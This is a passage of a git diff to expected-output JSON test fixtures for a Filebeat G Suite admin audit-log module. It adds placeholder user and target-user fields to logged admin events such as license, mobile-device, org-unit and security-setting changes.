"user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", @@ -469,7 +513,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "GROUP_MEMBER_BULK_UPLOAD", @@ -519,7 +571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GROUP_MEMBERS_DOWNLOAD", @@ -567,7 +622,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_NAME", @@ -619,7 +677,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_SETTING", @@ -673,7 +734,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "WHITELISTED_GROUPS_UPDATED", @@ -726,6 +790,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json index 1fd3a0da6e23..2f36dd24262d 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT", @@ -97,7 +100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_ASSIGNMENT", @@ -148,7 +154,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_LICENSE_AUTO_ASSIGN", @@ -198,7 +210,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_REASSIGNMENT", @@ -250,7 +265,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ORG_LICENSE_REVOKE", @@ -300,7 +321,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_REVOKE", @@ -351,7 +375,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPDATE_DYNAMIC_LICENSE", @@ -402,6 +432,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json index 10f080230c41..7b41064d5a89 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json @@ -51,7 +51,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ACTION_REQUESTED", @@ -105,7 +111,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_MOBILE_CERTIFICATE", @@ -155,7 +167,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_DEVICES_BULK_CREATION", @@ -203,7 +218,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_BLOCKED", @@ -252,7 +270,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_DEVICE_DELETION", @@ -301,7 +322,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_UNBLOCKED", @@ -350,7 +374,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_WIPED", @@ -399,7 +426,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT", @@ -453,7 +483,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER", @@ -502,7 +535,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_APPLICATION_FROM_WHITELIST", @@ -553,7 +589,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_SETTINGS", @@ -608,7 +647,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_MOBILE_APPLICATION_TO_WHITELIST", @@ -659,7 +701,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOBILE_DEVICE_APPROVE", @@ -711,7 +756,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_BLOCK", @@ -763,7 +814,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_DELETE", @@ -815,7 +872,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_WIPE", @@ -867,7 +930,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_MOBILE_SETTING", @@ -920,7 +989,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ADMIN_RESTRICTIONS_PIN", @@ -969,7 +1041,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_WIRELESS_NETWORK", @@ -1019,7 +1094,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_MOBILE_WIRELESS_NETWORK", @@ -1069,7 +1147,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_WIRELESS_NETWORK", @@ -1119,7 +1200,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD", @@ -1169,7 +1253,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_CERTIFICATE", @@ -1219,7 +1306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT", @@ -1266,7 +1356,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT", @@ -1313,7 +1406,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS", @@ -1360,7 +1456,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS", @@ -1407,7 +1506,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOBILE_ACCOUNT_WIPE", @@ -1459,7 +1561,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE", @@ -1511,7 +1619,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK", @@ -1563,6 +1677,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json index b4cdd02f0bde..854d75f96fdf 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", @@ -200,7 +209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_DEVICE_ENROLLMENT_TOKEN", @@ -248,7 +260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ASSIGN_CUSTOM_LOGO", @@ -296,7 +311,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNASSIGN_CUSTOM_LOGO", @@ -344,7 +362,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ENROLLMENT_TOKEN", @@ -392,7 +413,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REVOKE_ENROLLMENT_TOKEN", @@ -440,7 +464,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_LICENSES_ALLOWED", @@ -490,7 +517,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ORG_UNIT", @@ -538,7 +568,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_ORG_UNIT", @@ -586,7 +619,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EDIT_ORG_UNIT_DESCRIPTION", @@ -634,7 +670,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_ORG_UNIT", @@ -683,7 +722,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EDIT_ORG_UNIT_NAME", @@ -732,7 +774,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", @@ -780,7 +825,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SERVICE_ENABLED", @@ -834,6 +882,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json index d08d68f872e1..609025f91377 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", @@ -201,7 +210,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_TO_TRUSTED_OAUTH2_APPS", @@ -252,7 +264,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", @@ -303,7 +318,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "BLOCK_ON_DEVICE_ACCESS", @@ -352,7 +370,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", @@ -406,7 +427,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", @@ -460,7 +484,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", @@ -514,7 +541,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", @@ -568,7 +598,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", @@ -621,7 +654,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_CAA_ENABLEMENT", @@ -669,7 +705,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CAA_ERROR_MESSAGE", @@ -718,7 +757,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CAA_APP_ASSIGNMENTS", @@ -770,7 +812,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -818,7 +863,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -866,7 +914,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", @@ -920,7 +971,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENFORCE_STRONG_AUTHENTICATION", @@ -976,7 +1030,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", @@ -1027,7 +1084,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", @@ -1081,7 +1141,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SESSION_CONTROL_SETTINGS_CHANGE", @@ -1133,7 +1196,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SESSION_LENGTH", @@ -1183,7 +1249,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNBLOCK_ON_DEVICE_ACCESS", @@ -1232,6 +1301,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json index 8847953dbf3d..6d7d3e377145 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json @@ -50,7 +50,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_WEB_ADDRESS", @@ -103,7 +106,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SITES_SETTING", @@ -156,7 +162,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES", @@ -207,7 +216,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VIEW_SITE_DETAILS", @@ -255,6 +267,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json index b3be5557b035..832cbfc26b72 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json @@ -47,7 +47,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GENERATE_2SV_SCRATCH_CODES", @@ -97,7 +103,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_3LO_DEVICE_TOKENS", @@ -149,7 +161,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_3LO_TOKEN", @@ -200,7 +218,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_RECOVERY_EMAIL", @@ -250,7 +274,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_RECOVERY_PHONE", @@ -300,7 +330,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GRANT_ADMIN_PRIVILEGE", @@ -350,7 +386,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_ADMIN_PRIVILEGE", @@ -400,7 +442,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_ASP", @@ -451,7 +499,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TOGGLE_AUTOMATIC_CONTACT_SHARING", @@ -502,7 +556,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "BULK_UPLOAD", @@ -552,7 +612,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "BULK_UPLOAD_NOTIFICATION_SENT", @@ -603,7 +666,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CANCEL_USER_INVITE", @@ -654,7 +723,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_CUSTOM_FIELD", @@ -707,7 +782,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_EXTERNAL_ID", @@ -759,7 +840,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_GENDER", @@ -811,7 +898,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_IM", @@ -863,7 +956,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ENABLE_USER_IP_WHITELIST", @@ -915,7 +1014,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_KEYWORD", @@ -967,7 +1072,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_LANGUAGE", @@ -1019,7 +1130,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_LOCATION", @@ -1071,7 +1188,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_ORGANIZATION", @@ -1123,7 +1246,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": 